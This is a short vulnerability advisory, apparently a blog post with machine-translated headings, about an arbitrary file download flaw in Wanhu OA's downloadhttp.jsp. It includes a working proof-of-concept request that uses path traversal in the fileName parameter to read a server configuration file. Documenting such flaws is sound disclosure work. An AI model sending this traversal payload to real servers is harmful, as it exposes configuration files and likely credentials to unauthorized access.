Wanhu Oa Downloadhttp Jsp Any File Download Vulnerability
Wanhu Oa Downloadhttp Jsp Any File Download Vulnerability
Wanhu OA downloadhttp.jsp any file download vulnerability
Vulnerability Description
There is a vulnerability to download any file on Wanhu OA downloadhttp.jsp file. The attacker can download any file on the server through the vulnerability.
Vulnerability Impact
Ten thousand households OA
Network surveying and mapping
Vulnerability reappears
Product Page
Verify POC
1
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp
This post is licensed under CC BY 4.0 by the author.